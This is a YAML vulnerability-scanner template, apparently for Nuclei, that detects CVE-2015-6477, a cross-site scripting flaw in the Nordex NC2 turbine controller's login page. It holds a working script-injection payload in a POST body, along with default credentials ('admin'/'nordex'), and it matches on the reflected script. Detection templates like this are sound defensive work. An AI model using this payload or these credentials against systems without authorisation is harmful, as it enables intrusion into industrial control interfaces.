35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
id: CVE-2015-6477
|
|
|
|
info:
|
|
name: Nordex NC2 - Cross-Site Scripting
|
|
author: geeknik
|
|
severity: medium
|
|
description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2015/Dec/117
|
|
- https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-6477
|
|
classification:
|
|
cve-id: CVE-2015-6477
|
|
tags: xss,iot,nordex,nc2,seclists,cve,cve2015
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- "{{BaseURL}}/login"
|
|
body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert('{{randstr}}')</script>"
|
|
|
|
# Enhanced by mp on 2022/08/12
|